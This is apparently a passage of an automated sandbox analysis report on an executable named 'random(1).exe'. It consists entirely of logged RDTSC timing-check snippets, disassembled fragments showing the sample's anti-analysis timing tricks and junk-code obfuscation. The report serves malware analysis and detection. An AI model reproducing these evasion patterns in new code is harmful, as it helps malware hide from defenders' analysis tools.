              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CC9B second address: 108CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091727 second address: 109172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091D1C second address: 1091D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D36 second address: 1092D49 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06D8518548h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D49 second address: 1092D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D4D second address: 1092D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D53 second address: 1092D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091F3F second address: 1091F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F06D8518557h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099722 second address: 109972C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109972C second address: 1099732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099732 second address: 1099736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092F04 second address: 1092F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099736 second address: 1099743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1096897 second address: 109689D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109689D second address: 10968DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F06D8B4D9D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10968DA second address: 10968DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FF2 second address: 1093FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FF8 second address: 1093FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FFC second address: 109400D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B7AC second address: 109B7B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D851854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B7B6 second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F06D8B4D9C8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 clc 0x00000024 mov dword ptr [ebp+122D2043h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F06D8B4D9C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov dword ptr [ebp+12463B99h], ecx 0x0000004c add bx, BFA7h 0x00000051 mov ebx, dword ptr [ebp+122D215Ah] 0x00000057 push 00000000h 0x00000059 add bx, E144h 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007F06D8B4D9C6h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B825 second address: 109B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B829 second address: 109B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1098952 second address: 109895C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109A8B5 second address: 109A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B997 second address: 109B99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109D827 second address: 109D848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jns 00007F06D8B4D9D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109D848 second address: 109D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109CA6D second address: 109CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109CB7F second address: 109CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109EBAD second address: 109EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F06D8B4D9C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A1818 second address: 10A181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A181C second address: 10A1822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A0949 second address: 10A09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F06D8518558h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F06D8518548h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 add dword ptr [ebp+122D3672h], edx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx edi, di 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push esi 0x0000003f mov ebx, 2615F3AEh 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D05E9h] 0x0000004b mov dword ptr [ebp+122D38A3h], ebx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F06D8518548h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add bh, 00000055h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jno 00007F06D851854Ch 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A1AD3 second address: 10A1AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A2A4A second address: 10A2A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF37 second address: 104BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF3B second address: 104BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 jbe 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF50 second address: 104BF56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF56 second address: 104BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF60 second address: 104BF64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF64 second address: 104BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8518553h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF86 second address: 104BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1041BF5 second address: 1041BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA679 second address: 10AA688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA688 second address: 10AA69B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AAB6B second address: 10AAB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2450 second address: 10B2458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2458 second address: 10B2487 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F06D8B4D9CDh 0x00000013 pop eax 0x00000014 push edi 0x00000015 jl 00007F06D8B4D9C6h 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2487 second address: 10B24A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24A7 second address: 10B24AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24AB second address: 10B24D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F06D8518561h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F06D8518553h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7785 second address: 10B77A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8B4D9D9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B640E second address: 10B6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6418 second address: 10B6447 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F06D8B4D9E0h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F06D8B4D9D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6447 second address: 10B644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644B second address: 10B644F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644F second address: 10B6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6DC8 second address: 10B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F14 second address: 10B6F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F1E second address: 10B6F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F28 second address: 10B6F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F06D8518559h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8518556h 0x00000018 jp 00007F06D8518546h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B724F second address: 10B725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B725D second address: 10B7282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F06D8518546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F06D8518554h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7282 second address: 10B7288 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7288 second address: 10B72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8518550h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B72A3 second address: 10B72C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F06D8B4D9E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8B4D9D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7459 second address: 10B7469 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jnp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7469 second address: 10B746E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B746E second address: 10B747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B75F7 second address: 10B7614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC394 second address: 10BC398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC515 second address: 10BC549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F06D8B4D9C6h 0x0000000a jmp 00007F06D8B4D9D2h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jnp 00007F06D8B4D9D2h 0x00000018 jmp 00007F06D8B4D9CAh 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC549 second address: 10BC551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBAB6 second address: 10BBABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBABA second address: 10BBACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06D851854Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBACE second address: 10BBB05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBB05 second address: 10BBB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC870 second address: 10BC874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC874 second address: 10BC889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jns 00007F06D8518546h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB20 second address: 10BCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB28 second address: 10BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F06D851854Ah 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCE11 second address: 10BCE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC7B second address: 108EC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC8D second address: 108EC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC93 second address: 108EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC97 second address: 108EC9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC9B second address: 106B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F06D8518548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call dword ptr [ebp+122D281Dh] 0x0000002b jmp 00007F06D8518559h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EE30 second address: 108EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F244 second address: 108F248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F248 second address: 108F256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F06D8B4D9CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F466 second address: 108F48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F06D8518548h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnl 00007F06D851854Ch 0x00000016 jo 00007F06D851854Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
